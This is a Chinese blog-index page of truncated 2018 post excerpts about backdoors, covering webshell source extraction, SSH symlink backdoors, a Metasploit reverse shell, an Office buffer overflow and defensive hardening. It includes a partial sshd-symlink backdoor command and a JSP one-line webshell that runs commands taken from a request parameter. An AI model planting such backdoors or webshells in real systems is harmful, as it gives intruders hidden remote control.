Part 1 前言 https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 Part 2 分析 第22行这里eval修改成exit,修改后,运行代码。 复制代码。 修改代码,如图. 运行代码,右键查看源代码,代码出来了。 Part 3 后门 常在河边走, ...
分类:
Web程序 时间:
2018-06-23 14:35:59
阅读次数:
778
1、SSH后门分类 SSH后门方式有以下几种 软链接 SSH Server wrapper SSH Keylogger 2、软链接 利用方法 [root@helen] ln sf /usr/sbin/sshd /tmp/su; /tmp/su oPort=2333; 排查方法 [root@helen ...
分类:
系统相关 时间:
2018-06-11 23:35:27
阅读次数:
668
网站域名被拦截 就是 被百度或腾讯安全中心或360浏览器的安全中心提示拦截风险了 (妥善解决办法 如果网站类型不是BC SQ站的话 可以检查下网站有无被入侵被挂马导致的风险提示拦截 如果网站被篡改导致的那么就要仔细检查下网站的程序漏洞以及后门木马的查杀了) 网站被流量劫持 就是 地区dns的劫持 如 ...
分类:
Web程序 时间:
2018-06-06 21:32:44
阅读次数:
240
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。 举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。 ...
分类:
其他好文 时间:
2018-06-06 18:19:21
阅读次数:
279
一、限定某个目录禁止解析php通过禁止php解析图片目录,来限制网站被×××恶意找到后门获取到数据库权限#vim/usr/local/apache2.4/conf/extra/httpd-vhosts.conf#/usr/local/apache2.4/bin/apachectl-t#/usr/local/apache2.4/bin/apachectlgraceful#mkdirupload//在
分类:
Web程序 时间:
2018-06-05 13:21:38
阅读次数:
171
1.首先生成我们的小可爱,后期免杀后植入别人电脑中的. 2.进入Metasploit,执行以下操作 3.将我们的小可爱(lyshark.exe)使用各种途径在目标主机上运行,之后会看到反弹了shell 4.此时主机已经沦陷,查看一下系统吧 注意:此方法必须要目标主机上运行才行,比较无脑! ...
分类:
Web程序 时间:
2018-06-02 14:57:51
阅读次数:
743
前段时间,freebuf曝光百度软件中心的putty存在后门,之后网站下架全面整改。所以,下载软件请认准官网putty的官网:https://www.chiark.greenend.org.uk/~sgtatham/putty/ 那么,如果去找一个未知的软件的官网呢,这就需要我们提高自己的信息辨识度了。首先我们可以从搜索引擎下随意下载一个软件,然后找到About信息页,后面的信息基本一目了然如果是
分类:
其他好文 时间:
2018-06-02 12:20:22
阅读次数:
184
一:执行系统命令: 无回显执行系统命令: 1 <%Runtime.getRuntime().exec(request.getParameter("i"));%> 1 <%Runtime.getRuntime().exec(request.getParameter("i"));%> 1 <%Runti ...
分类:
Web程序 时间:
2018-05-28 21:13:29
阅读次数:
231
后门的定义 实验准备 1、把虚拟机kali的网络改为桥接 2、修改windows控制台的编码方式 法一:在cmd中输入 CHCP 65001(临时转码,不可永久) 法二:修改regedit注册表 详细操作见此地址:(百度的力量十分强大)https://blog.csdn.net/chy555chy/ ...
分类:
其他好文 时间:
2018-05-27 21:37:16
阅读次数:
186
2017 2018 2 20155225《网络对抗技术》实验二+ 后门进阶 恶意代码绑定技术研究 EXE文件捆绑机——ExeBinder EXE捆绑机可以将两个可执行文件(EXE文件)捆绑成一个文件,运行捆绑后的文件等于同时运行了两个文件。它会自动更改图标,使捆绑后的文件和捆绑前的文件图标一样,看不 ...
分类:
其他好文 时间:
2018-05-27 14:45:13
阅读次数:
221
